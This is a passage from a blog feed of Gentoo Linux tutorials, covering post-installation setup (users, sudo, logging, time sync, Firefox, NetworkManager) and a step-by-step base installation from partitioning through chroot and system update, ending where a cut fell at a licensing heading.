   ```

   or

   ```shell
   exit
   ```

   Then switch back to your graphical session with `Ctrl + Alt + F7` (the exact function key depends on your setup).

Using TTY mode provides an alternative way to access your system and perform tasks when you encounter issues within your desktop environment.

## What Comes After?

Congratulations! You&apos;ve successfully set up your Gentoo system and are now equipped with a powerful foundation for your Linux journey. However, this isn&apos;t the end; it&apos;s just the beginning.

For a detailed guide on these post-installation steps, check out [this link](/en/blog/linux/gentoo/gentoo-post-installation/) to take your Gentoo experience to the next level.

## References

- [Gentoo: Xorg/Guide](https://wiki.gentoo.org/wiki/Xorg/Guide)
- [Gentoo: Xfce](https://wiki.gentoo.org/wiki/Xfce)
- [Gentoo: Firefox](https://wiki.gentoo.org/wiki/Firefox)
- [Gentoo: LightDM](https://wiki.gentoo.org/wiki/LightDM)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Enhancing Your Gentoo Linux Installation: Post-Installation</title><link>https://ummit.dev//posts/linux/distribution/gentoo/gentoo-post-installation/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/distribution/gentoo/gentoo-post-installation/</guid><description>Take your Gentoo Linux system to the next level with user management, sudo, system logging, NTP time synchronization, CPU optimization, Neofetch, Wi-Fi support. and Others.</description><pubDate>Wed, 20 Sep 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

In our previous article, we accomplished the installation of XFCE with XORG, setting the stage for a functional Gentoo Linux system. Now, as we delve into this comprehensive post-installation guide, we&apos;ll lead you through pivotal steps aimed at elevating the security, functionality, and performance of your Gentoo setup. By the time we wrap up, you&apos;ll have a fully operational Gentoo Linux system tailored to meet your daily computing needs.

## User Management

During the installation process, you primarily used the root account for configuration tasks. However, for improved security and easier system management, it&apos;s essential to create a dedicated user account for everyday use.

In addition, as a long-time Linux user, I don&apos;t think there is any need to explain why you should use a normal user account for daily work.

### Create a User Account

Follow these steps to create a new user account. Replace `&lt;username&gt;` with your desired username:

```bash
# Create a new user with necessary group memberships and set the shell to /bin/bash
useradd -m -G users,wheel,audio -s /bin/bash &lt;username&gt;
```

- `useradd -m -G users,wheel,audio -s /bin/bash &lt;username&gt;`: This command creates a new user account with the specified username (`&lt;username&gt;`) and assigns it to essential groups, including &quot;users,&quot; &quot;wheel,&quot; and &quot;audio.&quot; The `-m` flag ensures a home directory is created for the user, and the `-s /bin/bash` flag sets the user&apos;s default shell to `/bin/bash`.

Next, set the user&apos;s password:

```shell
passwd &lt;username&gt;
```

After completing this step, your daily-use account is ready.

### Switch to the New User

To complete the user setup and start using your new user account, switch to the newly created user with the following command:

```bash
# Switch to the newly created user
su - &lt;username&gt;
```

From here on, you can switch between accounts at any time with the `su` command.

### Installing `sudo` for Administrative Tasks

Working without `sudo` is a real hassle, so it&apos;s worth installing right away. By default, Gentoo doesn&apos;t include `sudo`, yet it is invaluable for performing administrative tasks with elevated privileges. To install it, use this command:

```bash
emerge --ask --verbose sudo
```

This command installs `sudo` on your system, allowing you to execute administrative commands securely. With `sudo`, you can perform tasks like package management and system configuration without needing to log in as the root user.

### Configure `sudo` Access

To configure `sudo` access for your new user, follow these steps:

```bash
visudo
```

- `visudo`: Use this command to safely edit the sudoers file, which controls who has access to administrative privileges via `sudo`.

Within the sudoers file, locate the line `%wheel ALL=(ALL) ALL` and uncomment it by removing the `#` symbol at the beginning of the line. This action allows users in the &quot;wheel&quot; group to execute commands with sudo privileges:

```bash
# Uncomment the line below to allow users in the wheel group to execute commands with sudo privileges
%wheel ALL=(ALL) ALL
```

It&apos;s also recommended to set `Defaults timestamp_timeout=0` in the sudoers file. This disables credential caching, so `sudo` prompts for your password on every invocation:

```bash
Defaults timestamp_timeout=0
```

After completing these steps, you have a fully functional user account with sudo privileges. With `timestamp_timeout` set to 0, `sudo` asks for your password every time, which adds an extra layer of security.
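
For reference, the finished configuration amounts to just these two lines. The sketch below stages them in a shell variable for inspection; on the real system you would enter them through `visudo` (or validate a drop-in file with `visudo -c -f` before placing it under `/etc/sudoers.d/`, assuming your sudoers file includes that directory):

```shell
# Sketch only: the two sudoers lines discussed above, staged for inspection.
# On a live system, always edit via visudo so syntax errors are caught.
sudoers_lines='%wheel ALL=(ALL) ALL
Defaults timestamp_timeout=0'
printf '%s\n' "$sudoers_lines"
```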

## Useful tools

As you finalize your Gentoo Linux installation, consider adding essential packages to enhance your system&apos;s functionality and convenience.

### 1. Install `sysklogd` for System Logging

System logging is crucial for keeping track of system events and activities. `sysklogd` is a reliable tool for managing system logs. To install it, run the following command:

```bash
emerge --ask app-admin/sysklogd
```

After installation, add `sysklogd` to the list of services that start automatically at boot with the following command:

```bash
rc-update add sysklogd default
```

By doing this, `sysklogd` will begin capturing log messages from the early stages of system startup, providing you with a comprehensive record of system events.

### 2. Install `chrony` for Time Synchronization

Accurate timekeeping is crucial for various system functions and services. `chrony` is a reliable tool for time synchronization. To install it, use the following command:

```bash
emerge --ask net-misc/chrony
```

Once `chrony` is installed, add it to the startup services to ensure that your system&apos;s time stays accurate:

```bash
rc-update add chronyd default
```

`chronyd` will synchronize your system&apos;s time with time servers on the internet, helping to maintain accurate time for various system operations.

### 3. Install `wireless-tools` for Wi-Fi Management (Optional)

If you use Wi-Fi for your network connection, installing `wireless-tools` can be helpful for managing wireless networking. However, if you prefer using a wired LAN connection or don&apos;t need Wi-Fi support, you can skip this step.

To install `wireless-tools`, use the following command:

```bash
emerge -av wireless-tools
```

### 4. Install `CPUID2CPUFLAGS` for CPU Optimization

Optimizing software performance for your specific CPU architecture is essential for getting the most out of your hardware. The CPUID2CPUFLAGS utility helps identify CPU-specific flags, which are crucial for compiling software tailored to your CPU. To install it, use this command:

```shell
emerge --ask app-portage/cpuid2cpuflags
```

After installation, run the following command to determine the CPU flags specific to your system:

```shell
cpuid2cpuflags
```

This utility detects your CPU&apos;s capabilities and outputs the appropriate flags. These flags will be used during package compilation to ensure optimized performance.

To configure Gentoo to use these CPU flags for all packages, create a file named `00cpu-flags` in the `/etc/portage/package.use/` directory:

```shell
echo &quot;*/* $(cpuid2cpuflags)&quot; &gt; /etc/portage/package.use/00cpu-flags
```

This file specifies the CPU flags for all packages, ensuring that software is compiled to take full advantage of your CPU&apos;s capabilities.
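
To see what ends up in `00cpu-flags`, here is the same shell expansion with a hypothetical `cpuid2cpuflags` output substituted in (the real flags depend entirely on your CPU):

```shell
# Hypothetical cpuid2cpuflags output -- your CPU will report its own set
sample="CPU_FLAGS_X86: aes avx avx2 sse4_1 sse4_2"
# Same construction as the echo above: a */* atom followed by the flags
line="*/* ${sample}"
echo "$line"   # → */* CPU_FLAGS_X86: aes avx avx2 sse4_1 sse4_2
```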

### 5. Install `neofetch` for System Information

`neofetch` is a handy utility that provides detailed information about your Gentoo system in a visually appealing way. To install `neofetch`, use the following command:

```bash
emerge -av neofetch
```

Once installed, you can run `neofetch` to quickly view system information, including your distribution, kernel version, CPU, memory, and more. It&apos;s a useful tool for getting an overview of your system&apos;s configuration.

![neofetch](./neofetch.png)

### 6. Install Gentoolkit

To assist in managing your Gentoo system and packages, installing Gentoolkit is a wise choice. Gentoolkit provides various helpful utilities for package management and system analysis. You can install it using the following command:

```shell
emerge --ask --verbose app-portage/gentoolkit
```

Once installed, you can leverage Gentoolkit to perform various tasks, including searching for package information, checking for reverse dependencies, and more. For instance, if you want to find out which packages depend on `www-client/firefox`, you can use the `equery` utility as follows:

```shell
equery depends www-client/firefox
```

This command will provide you with a list of packages that reference or rely on `www-client/firefox` in your Gentoo system.

### 7. Install Firefox

Certain packages may require manual configuration to ensure compatibility and functionality. One such example is configuring `alsa-plugins` for Firefox. The required version of `alsa-plugins` may change over time, so it&apos;s essential to follow the prompts during the installation process.

#### Manual Configuration for Firefox

To set up `alsa-plugins` with the correct version for Firefox, use the following command:

```shell
echo &quot;&gt;=media-plugins/alsa-plugins-1.2.7.1-r1 pulseaudio&quot; &gt; /etc/portage/package.use/alsa-plugins
```

This command specifies the version and configuration for `alsa-plugins` to work seamlessly with Firefox. If the version changes in the future, running the installation command again will prompt you with the updated version, allowing you to input the correct information.

#### Proceed to Install Firefox

Now, you can proceed to install Firefox. Gentoo offers two options: building it from source or installing a pre-built binary version. Here are the commands for both options:

To build Firefox from source:

```shell
emerge --ask --verbose www-client/firefox
```

To install the pre-built binary version:

```shell
emerge --ask --verbose www-client/firefox-bin
```

#### Launching Firefox

Once Firefox is installed, you can easily launch it by typing the following command in your terminal:

For the source-built Firefox:

```shell
firefox
```

For the pre-built binary version of Firefox:

```shell
firefox-bin
```

By following these steps, you&apos;ll have a fully configured Firefox web browser on your Gentoo system, ready for all your browsing needs.

### 8. Network Connectivity with NetworkManager

NetworkManager is a versatile software crafted to efficiently manage an array of network connections, including wired, wireless, DSL, dial-up, VPN, WiMAX, and mobile broadband networks.

### Installation

For a seamless network management experience, install NetworkManager using the following command in your shell:

```shell
sudo emerge --ask --verbose net-misc/networkmanager
```

### Autostart at Boot

Ensure NetworkManager starts automatically at boot by adding it to the default run level with the following command:

```shell
rc-update add NetworkManager default
```

Whether you need standard wired and wireless connections or desire to set up custom networks like WireGuard or OpenVPN, NetworkManager provides a user-friendly platform for configuring and managing diverse network environments.

## Summary

These tools make daily use of Gentoo more pleasant. None of them are strictly required, but they will definitely help in your future work and overall experience.

## References

- [Gentoo: Finalizing](https://wiki.gentoo.org/wiki/Handbook:AMD64/Installation/Finalizing)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Comprehensive Guide to Installing Gentoo Linux with OpenRC</title><link>https://ummit.dev//posts/linux/distribution/gentoo/gentoo-ultimate-installation-tutorial/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/distribution/gentoo/gentoo-ultimate-installation-tutorial/</guid><description>Explore this in-depth guide to installing Gentoo Linux using OpenRC, focusing on Linux installation without Windows and Desktop Environments (DE).</description><pubDate>Sat, 16 Sep 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Gentoo Linux is a distribution known for its flexibility, performance, and robustness. In this comprehensive guide, we will walk you through the process of installing Gentoo Linux step by step. By the end of this tutorial, you will have a fully functional Gentoo Linux system ready for your customization.

&gt;Note: This article covers only the most basic settings.

## Prerequisites

Before embarking on the exciting journey of installing Gentoo Linux, it&apos;s essential to ensure you have everything you need:

- **Linux Proficiency:** You should be comfortable with Linux, understand how it works under the hood, and have experience with tasks like installing Arch Linux. Gentoo is famously flexible, but if you don&apos;t understand what each command does, the installation will be very painful; expect it to take anywhere from a week to several weeks.

- **Stable Internet Connection:** Gentoo requires downloading various packages and the Stage3 tarball during installation. Ensure you have a reliable and reasonably fast internet connection to expedite this process.

- **Hardware or Virtual Machine:** Prepare a physical machine or set up a virtual machine (VM) where you intend to install Gentoo. Whether it&apos;s real hardware or a virtual environment, Gentoo can adapt to your choice.

- **CPU Cores:** The more CPU cores, the better. Nearly everything in Gentoo is compiled from source rather than installed as a pre-built binary, so your CPU largely determines how long installation and updates take.

Now, let&apos;s get started with the installation process:

1. **Visit the Official Gentoo Website:** Open your web browser and navigate to [gentoo.org](https://www.gentoo.org/).

![Download ISO](./Download-iso.png)

2. **Download the Minimal Installation CD:** On the Gentoo download page, locate the &quot;Minimal Installation CD (amd64)&quot; option and click to initiate the download of the Gentoo ISO image.

With these prerequisites addressed, let&apos;s boot the ISO on your machine!

## Step 1: Initial Setup

Before delving into the installation process, there are a few critical preliminary steps to ensure a smooth Gentoo Linux installation:

### Choose Keyboard Layout

As you boot up the Gentoo Linux ISO, your first decision is to select the appropriate keyboard layout. The default setting is a US keyboard layout. To confirm this choice, simply press Enter.

### Verify Internet Connectivity

Before beginning the installation, it&apos;s crucial to confirm that you have a working internet connection:

```shell
ping gentoo.org
```

A successful response indicates that your network connection is functional and ready for the installation process.

### List Available Block Devices

Next, identify the storage device where you&apos;ll install Gentoo:

```shell
lsblk
```

The `lsblk` command provides a comprehensive list of available block devices on your system. Take note of the device you intend to use for the Gentoo installation.

### Initialize GPT Partition Table

Now, let&apos;s initialize the GUID Partition Table (GPT) on your chosen device:

```shell
gdisk /dev/vda
```

Once inside the `gdisk` utility, follow these steps:

1. Type &quot;o&quot; to create a new GPT partition table. Please note that this action will erase all existing data on the selected device.

2. Press &quot;n&quot; to create a new partition. Specify the partition type as &quot;ef00&quot; (EFI system partition) and allocate a size of at least +1G. This partition is essential for EFI booting.

3. Use &quot;n&quot; once more to create the swap partition. Specify the type code &quot;8200&quot; (Linux swap) and allocate at least +10G.

4. Again, press &quot;n&quot; to create a partition. This time, allocate the remaining space for it. This partition will serve as the root filesystem.

5. Confirm the partition table by typing &quot;p&quot; to review its contents. Ensure that all partitions have been created correctly.

6. If everything appears as expected, save your changes by typing &quot;w&quot;. This writes the new partition table to the disk.

When defining partition sizes during GPT initialization, the `+` notation specifies a size relative to the partition&apos;s starting sector; for example, `+10G` creates a 10 GiB partition.

Upon completion, your partition layout should resemble the following example (based on my configuration):

| Number   | Size                           | Code | Name                 |
|----------|--------------------------------|------|----------------------|
| 1 (vda1) | +1G (1024.0 MiB)               | ef00 | EFI system partition |
| 2 (vda2) | +10G (10.0 GiB)                | 8200 | Linux swap           |
| 3 (vda3) | All remaining space (90.0 GiB) | 8300 | Linux filesystem     |

This sets the stage for the partitioning of your device to host the Gentoo Linux installation.

## Step 2: Partitioning

In this step, you will create and format the necessary partitions for your Gentoo installation. These partitions will serve distinct roles, including EFI booting, housing the core filesystem, and providing swap space.

### Format EFI Partition

To ensure your system supports EFI booting, the EFI partition needs to be correctly formatted with the FAT32 file system. Use the following command:

```shell
mkfs.fat -F32 /dev/vda1
```

This command prepares the EFI partition (/dev/vda1) with the FAT32 file system, a requirement for EFI-based booting.

### Format Root Partition

The root partition is where the core Gentoo filesystem will reside. Format it with the Btrfs file system using this command:

```shell
mkfs.btrfs /dev/vda3
```

By running this command, you&apos;re configuring the root partition (/dev/vda3) with the Btrfs file system, a modern and flexible choice for managing your Gentoo installation.

### Create Swap Partition

Swap space is essential for memory management in your system. Begin by initializing the swap partition with this command:

```shell
mkswap /dev/vda2
```

This command prepares the swap partition (/dev/vda2) for use in your Gentoo system.

### Enable Swap

Activate the swap partition to make it available for use in your system:

```shell
swapon /dev/vda2
```

This step ensures that your Gentoo installation can effectively manage system memory.

### Create a Mount Point

Before proceeding, create the required directory structure for your Gentoo filesystem:

```shell
mkdir --parents /mnt/gentoo
```

This command establishes the necessary directory structure within the `/mnt` directory, specifically the `/mnt/gentoo` directory, which will serve as the mount point for your Gentoo installation.

### Mount the Root Partition

Now, it&apos;s time to associate the root partition with the mount point:

```shell
mount /dev/vda3 /mnt/gentoo
```

By executing this command, you&apos;re linking your Gentoo root partition (/dev/vda3) with the `/mnt/gentoo` directory. This association allows you to access and configure the contents of your Gentoo installation within this directory. It&apos;s a pivotal step in setting up your Gentoo Linux system.

## Step 3: Setting the System Clock

Now, ensuring your system&apos;s clock is accurate is crucial. An incorrect system time can cause download errors and lead to issues post-installation. Here&apos;s a quick guide on how to verify and set the date and time in Gentoo.

### Checking Current Date and Time

Firstly, check your system&apos;s date and time by running the date command:

```shell
date
```

If the displayed date and time are significantly off, correct them using one of the methods below.

### Automatic Time Sync

Automatic time synchronization using a time server is the best option. Gentoo&apos;s official live environments include the `chronyd` command, which can sync your system clock to UTC using a time server such as `ntp.org`. Note that this method requires a working network configuration.

&gt;Warning: Automatic time sync reveals your system&apos;s IP address to the time server.

```shell
chronyd -q
```

### Manual Time Setting

The date command can manually set the system clock. Use the following format: `MMDDhhmmYYYY (Month, Day, Hour, Minute, and Year)`.

```shell
date &lt;MMDD&gt;&lt;hhmm&gt;&lt;YYYY&gt;
```

Set the system clock to the current date and time by replacing `&lt;MMDD&gt;&lt;hhmm&gt;&lt;YYYY&gt;` with the appropriate values.

#### Example

To set the date to October 20, 2023 at 16:40:

```shell
date 102016402023
```
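
If you find the `MMDDhhmmYYYY` string error-prone, GNU `date` (part of coreutils, available in the live environment) can build it from a human-readable date, letting you double-check the value before setting the clock:

```shell
# Build the MMDDhhmmYYYY string from a readable date (GNU date syntax)
stamp=$(date -d "2023-10-20 16:40" +%m%d%H%M%Y)
echo "$stamp"   # → 102016402023
# To actually set the clock you would then run: date "$stamp"
```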

Now it&apos;s time to download the Stage3 tarball.

## Step 4: Downloading the Stage3 Tarball

### Navigate to the Installation Directory

Begin by changing your working directory to `/mnt/gentoo`, which is where you&apos;ll install Gentoo. This location serves as the foundation for your Gentoo Linux system.

```shell
cd /mnt/gentoo
```

### Download the Stage3 Tarball

The Stage3 tarball is a crucial component of your Gentoo installation, containing the base system files. To obtain it, we&apos;ll use the text-based web browser called `links`. Follow these steps to access the official Gentoo website and download the Stage3 tarball tailored to your architecture:

1. Launch `links` by typing `links` into the terminal and pressing Enter.

2. In `links`, enter `g` to access the URL prompt, and then type the URL for [gentoo.org](https://www.gentoo.org/).

3. Once you&apos;ve entered the Gentoo website, navigate to the Stage3 tarball download section. Look for the appropriate Stage3 OpenRC file corresponding to your architecture (e.g., amd64).

4. Select the desired tarball file, initiate the download process, and save it to your system.

5. After the download completes successfully, exit the `links` program by pressing `ctrl+c`.

With these actions, you&apos;ve obtained the necessary Stage3 tarball, a foundational component for your Gentoo Linux installation. This tarball provides the core system files required to build and customize your Gentoo environment.

## Step 5: Extract the Tarball

Once you&apos;ve downloaded the Gentoo system, it&apos;s time to extract it.

&gt;Note: Be sure to include the options below. `--xattrs-include=&apos;*.*&apos;` preserves extended attributes, and `--numeric-owner` keeps the numeric user and group IDs stored in the tarball. This is very important.

### Extract the Tarball
```shell
tar xpvf stage3-*.tar.xz --xattrs-include=&apos;*.*&apos; --numeric-owner
```

Unpacking the Stage3 tarball using this command sets up the groundwork for your Gentoo system.

### Delete tar file

After successfully extracting the Gentoo system, you can safely delete the tarball.

```shell
rm -rfv stage3-*.tar.xz
```

## Step 6: Configuring make.conf

Gentoo Linux is renowned for its customization potential, offering users the ability to compile and configure their systems according to specific needs. In this step, we&apos;ll focus on improving compilation speed, refining the look of terminal output, and enabling GPU support.

### Edit `make.conf`

```shell
nano /mnt/gentoo/etc/portage/make.conf
```

Open the `make.conf` file for customization. This file holds crucial configuration options for the Portage package manager, providing a platform for tailoring your system to your preferences.

### Fine-Tune Compiler Flags

```shell
COMMON_FLAGS=&quot;-march=native -O2 -pipe&quot;
FEATURES=&quot;candy parallel-fetch parallel-install&quot;
MAKEOPTS=&quot;-j20&quot;
```

Within `make.conf`, you can set compiler flags to optimize system performance. Adjust these flags to align with your CPU architecture and personal preferences.

### Understanding the Flags

In Gentoo Linux, `make.conf` is a pivotal configuration file enabling you to optimize software package compilation and overall performance. The following flags offer customization options:

#### `COMMON_FLAGS=&quot;-march=native -O2 -pipe&quot;`

- `-march=native`: Directs the compiler to generate code tailored to your system&apos;s CPU architecture, automatically detecting your CPU type during compilation for optimized performance.
- `-O2`: Sets the optimization level for the compiler. `-O2` strikes a balance, improving code execution speed without significantly increasing compilation time.
- `-pipe`: Enables the use of pipes instead of temporary files for communication between different compilation stages, streamlining the process and reducing disk I/O.

#### `FEATURES=&quot;candy parallel-fetch parallel-install&quot;`

- `candy`: A purely cosmetic feature that replaces Portage&apos;s default progress spinner with a more playful animation during emerges.
- `parallel-fetch`: When enabled, permits Portage to download source code and files for packages concurrently, expediting the package installation process.
- `parallel-install`: Allows Portage to install multiple packages concurrently, particularly advantageous on systems with multiple CPU cores.

#### `MAKEOPTS=&quot;-j20&quot;`

- `-j20`: Specifies the number of parallel compilation jobs Portage can run simultaneously, allowing up to 20 parallel jobs. Adjust this value based on your system&apos;s CPU core count.
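
Rather than hard-coding the job count, you can derive it from the machine itself. A common rule of thumb is one job per CPU thread (`nproc` is part of coreutils); a frequently cited guideline is also to keep roughly 2 GiB of RAM available per job so large builds don&apos;t swap:

```shell
# Generate a MAKEOPTS line matching this machine's thread count
jobs=$(nproc)
echo "MAKEOPTS=\"-j${jobs}\""
```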

### GPU Support

To ensure optimal performance and compatibility with your hardware, consider adding the following configurations for mouse, keyboard, and GPU support in your Gentoo system.

#### Mouse, Keyboard, and Synaptics Touchpad Support:

```shell
INPUT_DEVICES=&quot;libinput synaptics&quot;
```

#### NVIDIA Cards:

```shell
VIDEO_CARDS=&quot;nouveau&quot;
```

#### Support for AMDGPU, RadeonSI, and AMD/ATI Cards:

```shell
VIDEO_CARDS=&quot;amdgpu radeonsi radeon&quot;
```

These configurations provide comprehensive support for input devices and graphics cards on your Gentoo system. Customize these settings based on your specific hardware and preferences, ensuring a seamless and optimized computing experience.

## Step 7: Repository Configuration

In this step, we establish the necessary configuration for managing package repositories using Portage, Gentoo&apos;s package manager. This allows you to define additional repositories beyond the defaults.

### Create the repos.conf Directory

To begin, create the `repos.conf` directory within the `/mnt/gentoo/etc/portage/` path:

```shell
mkdir --parents /mnt/gentoo/etc/portage/repos.conf
```

This directory is crucial for housing repository configurations.

### Copy Default Repository Configuration

Next, duplicate the default Gentoo repository configuration to ensure Portage can locate software packages. Execute the following command:

```shell
cp /mnt/gentoo/usr/share/portage/config/repos.conf /mnt/gentoo/etc/portage/repos.conf/gentoo.conf
```

This command copies the default repository settings from their typical location in `/usr/share/portage/config/repos.conf` to the specific location `/mnt/gentoo/etc/portage/repos.conf/gentoo.conf`. By doing this, you provide Portage with the necessary information to access software repositories.

## Step 8: Network Configuration files

Likewise, network configuration for the new environment is not set up by default in Gentoo, so you&apos;ll need to configure it manually to ensure proper network connectivity within your Gentoo environment. Follow these steps to set up your network.

### Copy the Host System&apos;s resolv.conf

Begin by copying the DNS resolver configuration from the host system to your Gentoo environment:

```shell
cp --dereference /etc/resolv.conf /mnt/gentoo/etc/
```

The `/etc/resolv.conf` file on the host system contains essential DNS resolver settings, enabling domain name resolution. By copying it to `/mnt/gentoo/etc/`, you ensure that Gentoo can also resolve domain names correctly. This step is crucial for maintaining consistent and reliable internet connectivity within your Gentoo installation.

Setting up network configuration correctly is essential for various system functions and software package management. This step ensures that your Gentoo environment can access the internet and external resources as needed.

## Step 9: Mounting System Directories

In this section, we mount essential system directories within the Gentoo environment. These directories play critical roles in the functioning of the Linux system.

### Mount /proc

```shell
mount --types proc /proc /mnt/gentoo/proc
```

The `/proc` directory provides a virtual filesystem that exposes information about running processes and the kernel&apos;s internal state. Mounting it within the Gentoo environment is essential for various system utilities and commands to retrieve process-related information.

### Mount /sys

```shell
mount --rbind /sys /mnt/gentoo/sys
mount --make-rslave /mnt/gentoo/sys
```

The `/sys` directory offers a view into the kernel&apos;s internal data structures and provides a way to interact with device drivers and kernel parameters. Mounting `/sys` with the `--rbind` option and then marking the mounts under `/mnt/gentoo/sys` as slaves means mount events propagate from the host into the chroot but not back, while still giving the Gentoo environment access to kernel and hardware information.

### Mount /dev

```shell
mount --rbind /dev /mnt/gentoo/dev
mount --make-rslave /mnt/gentoo/dev
```

The `/dev` directory is crucial for device interaction. It contains special files representing hardware devices and facilitates device-related operations. Mounting `/dev` with the `--rbind` option and marking the mounts under `/mnt/gentoo/dev` as slaves ensures that the Gentoo environment can access and manage devices effectively.

### Mount /run

```shell
mount --bind /run /mnt/gentoo/run
mount --make-slave /mnt/gentoo/run
```

The `/run` directory is essential for the proper functioning of various system services and daemons. It stores runtime information, including sockets and process IDs. Mounting `/run` and making it a slave of `/mnt/gentoo/run` ensures that system services within the Gentoo environment can operate as expected, contributing to a smoothly running system.

## Step 10: Chrooting into the New Environment

Now that your Gentoo system is prepared and mounted, it&apos;s time to enter the new environment and continue configuring it. Follow these steps to chroot into the new environment:

### Enter the Chroot Environment

Execute the following command to enter the chroot environment, where you will perform system configurations and installations:

```shell
chroot /mnt/gentoo /bin/bash
```

This command initiates a process called &quot;chrooting,&quot; which stands for &quot;change root.&quot; It allows you to transition into the newly installed Gentoo environment as if it were your root directory. After running this command, any further commands you execute will affect the Gentoo environment, not the host system.

### Apply Profile

After entering the chroot environment, it&apos;s essential to load the system-wide profile settings from `/etc/profile`. This step ensures that all necessary environment variables and system configurations are in place, allowing you to work effectively within the Gentoo system. Execute the following command:

```shell
source /etc/profile
```

This command ensures that the profiles are applied correctly to your newly installed Gentoo system.
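
It also helps to mark the shell prompt so you can always tell whether a given terminal is inside the chroot, a step the official installation handbook recommends as well:

```shell
# Prefix the prompt so chroot shells are visually distinct
export PS1="(chroot) ${PS1}"
```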

Chrooting into the new environment is a critical step in the Gentoo installation process, as it allows you to perform essential configurations and installations within the Gentoo environment itself. It&apos;s the point at which you transition from setting up the installation environment to configuring the actual Gentoo system.

## Step 11: EFI Partition (UEFI Users)

Now it&apos;s time to mount your EFI partition, which is essential for booting into your Gentoo system. Follow these steps:

### Create the EFI Directory

For users installing Gentoo on a UEFI (Unified Extensible Firmware Interface) system, creating the EFI directory is a crucial preparatory step:

```shell
mkdir /efi
```

- `mkdir /efi`: This command creates a directory named &quot;efi&quot; at the root of the file system, which will serve as the mounting point for the EFI system partition (ESP).

UEFI-based systems use the EFI system partition to store bootloader files and related information required for the boot process. By creating this &quot;efi&quot; directory, we establish the location where we will later mount the EFI partition.

### Mount the EFI Partition

After creating the &quot;efi&quot; directory, we proceed to mount the EFI partition onto this directory:

```shell
mount /dev/vda1 /efi
```

- `mount /dev/vda1 /efi`: This command instructs the system to mount the EFI partition, which is typically identified as `/dev/vda1`, onto the `/efi` directory. Mounting the EFI partition in this way ensures that the UEFI firmware can locate and access the necessary bootloader files and configuration data during the system&apos;s boot process.

In summary, this step is crucial for UEFI-based systems, as it sets up the directory structure and mounting point needed for successful UEFI booting, allowing Gentoo Linux to start correctly in such environments.

## Step 12: Initial Configuration

In this step, we&apos;ll perform the initial configuration for your Gentoo system, starting with synchronizing the Portage tree.

### Synchronize Portage Tree

On your first Gentoo installation, it&apos;s essential to synchronize your Portage tree database. You can achieve this by running the following command:

```shell
emerge-webrsync
```

- The `emerge-webrsync` command is a crucial step in keeping your Gentoo system up to date. It initiates the synchronization of the Portage tree, which is a critical component responsible for managing packages and their metadata. Synchronizing the Portage tree ensures that your system has access to the latest package information and updates. Please be patient, as this process may take some time. You can use this time for a break or grab a meal while it completes.
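`emerge-webrsync` fetches a daily snapshot of the tree over HTTP, which makes it the more firewall-friendly option for a first sync. On later syncs you can also use the rsync-based method:

```shell
emerge --sync
```

Both commands update the same Portage tree; which one you prefer afterwards is largely a matter of network environment.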

### Read Gentoo News

One of the interesting features of Gentoo is the ability to read package news using the `eselect` command. After completing the Portage tree synchronization, you can use the following command to stay informed about important Gentoo news:

```shell
eselect news read
```

- The `eselect news read` command allows you to access and read package news, which provides updates and information about changes within the Gentoo system. Staying up-to-date with Gentoo news is essential for understanding system updates and being aware of potential issues or important changes.

Gentoo&apos;s flexibility and features, such as the ability to read package news, make it a unique and powerful Linux distribution for experienced users.

### Update the System Profile

In this step, we will select an appropriate system profile. The profile defines default settings, USE flags, and the base set of packages for your system.

#### List Available System Profiles

Begin by listing the available system profiles with the following command:

```shell
eselect profile list
```

- The `eselect profile list` command provides you with a list of available system profiles. Each profile defines specific settings and configurations for your Gentoo system. You can choose from various profiles based on your requirements and preferences.

#### Set a System Profile

Next, select a system profile that aligns with your needs using the `eselect profile set` command. Replace the number &quot;5&quot; in the command below with the profile number you want to set:

```shell
eselect profile set 5
```

- Using the `eselect profile set` command, you can choose a system profile that best matches your desired system configuration. Keep in mind that the available profiles may vary, so select the one that suits your requirements.

#### Confirm the Selected Profile

Finally, it&apos;s essential to confirm that the correct system profile has been selected. This verification step ensures that your Gentoo system is configured as intended and aligns with your chosen specifications. Use the following command to confirm the selected profile:

```shell
eselect profile list
```

By following these steps, you ensure that your Gentoo system is configured with the appropriate profile, setting the stage for a well-customized and efficient environment.
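In the `eselect profile list` output, the active profile is marked with an asterisk. If you only want to see the current selection, `eselect` can print it directly:

```shell
eselect profile show
```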

## Selecting Fast Mirrors for Source Downloads (Optional)

To optimize your source downloads and ensure a swift installation process, choosing a fast mirror is highly recommended. Portage, Gentoo&apos;s package manager, relies on the `GENTOO_MIRRORS` variable in the `make.conf` file to determine the mirrors to use. Here&apos;s how you can conveniently select mirrors using the `mirrorselect` tool:

### Using `mirrorselect` Tool

1. **Install `mirrorselect` Tool:**
   Ensure you have the `mirrorselect` tool installed. If not, you can install it using:

   ```shell
   emerge --ask app-portage/mirrorselect
   ```

2. **Run `mirrorselect`:**
   Execute the following command to initiate `mirrorselect`:

   ```shell
   mirrorselect -i -o &gt;&gt; /etc/portage/make.conf
   ```

   This command queries the available mirrors and appends the selected mirrors to your `make.conf` file, optimizing your source downloads.

3. **Selecting Mirrors:**
   - Use the arrow keys to navigate to your preferred mirror(s) in the list displayed.
   - Press the `spacebar` to select one or more mirrors.
   - Once selected, press `Enter` to confirm your choice(s).

By using `mirrorselect`, you ensure that Portage fetches packages from nearby mirrors, significantly enhancing download speeds. This step is optional but highly recommended for a smoother Gentoo installation experience.

## Step 13: Updating the System

Now, let&apos;s proceed with updating your Gentoo system, which involves updating all installed packages, resolving dependencies, and potentially compiling new package versions.

### Update the System

Run the following command to update the entire system, including packages:

```shell
emerge --ask --verbose --update --deep --newuse @world
```

- The `emerge --ask --verbose --update --deep --newuse @world` command performs a comprehensive system update. It checks for updates to all installed packages, resolves dependencies, and considers any new USE flags (`--newuse`). This ensures that your Gentoo system is up to date with the latest software versions and security patches.
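World updates can compile for hours. If the process is interrupted partway through (a crash, a dropped SSH session, a stray Ctrl-C), Portage can pick up the remaining packages rather than starting over:

```shell
emerge --resume
```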

### Cleanup

After the system update, you can optimize your Gentoo system by removing packages that are no longer needed:

```shell
emerge --ask --depclean
```

The `emerge --ask --depclean` command helps free up disk space by removing packages that are no longer required after the update. The `--ask` flag lets you review the removal list before confirming, which is strongly recommended.

## Step 14: Licensing

